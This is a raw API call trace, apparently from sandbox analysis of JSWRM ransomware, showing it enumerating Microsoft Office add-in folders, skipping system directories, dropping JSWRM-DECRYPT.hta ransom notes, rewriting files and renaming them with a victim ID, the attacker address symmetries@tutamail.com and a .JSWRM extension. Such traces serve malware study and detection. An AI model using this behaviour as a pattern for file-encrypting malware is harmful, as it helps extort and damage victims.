(lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.269] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.269] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x897b914, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x897b914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97c9c99, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.269] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0126.270] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1662bb01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0126.270] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0126.270] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0126.270] lstrcmpiW (lpString1="da", lpString2="...") returned 1 [0126.270] lstrcmpiW (lpString1="da", lpString2="windows") returned -1 [0126.270] lstrcmpiW (lpString1="da", lpString2="recovery") returned -1 [0126.270] lstrcmpiW (lpString1="da", lpString2="perflogs") returned -1 [0126.270] lstrcmpiW (lpString1="da", lpString2="documents and settings") returned -1 [0126.270] lstrcmpiW (lpString1="da", lpString2="$RECYCLE.BIN") returned 1 [0126.270] lstrcmpiW (lpString1="da", lpString2="system volume information") returned -1 [0126.270] lstrcmpiW (lpString1="da", lpString2="msocache") returned -1 [0126.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\jswrm-decrypt.hta")) returned 0xffffffff [0126.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.272] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.272] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.273] CloseHandle (hObject=0x314) returned 1 [0126.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\jswrm-decrypt.hta")) returned 0x20 [0126.273] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41ecca28, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0126.273] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.273] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41ecca28, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.274] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.274] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.274] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ecca28, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41ecca28, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41ecca28, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.274] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.274] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.274] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.274] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.274] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.274] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.274] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.275] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.275] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.275] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.275] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1662bb01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1662bb01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.275] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241358, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.276] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4246) returned 1 [0126.276] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.276] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1090, lpOverlapped=0x0) returned 1 [0126.278] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.278] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1090, lpOverlapped=0x0) returned 1 [0126.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.278] CloseHandle (hObject=0x338) returned 1 [0126.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0126.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0126.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0126.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0126.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0126.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.279] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\da\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\da\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0126.280] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaf07af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf07af2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf07af2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0126.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0126.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23ddc8 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.280] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3f46636, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3f46636, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3f46636, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.280] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.281] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1d4bb8b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d4bb8b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d71cd8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.281] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 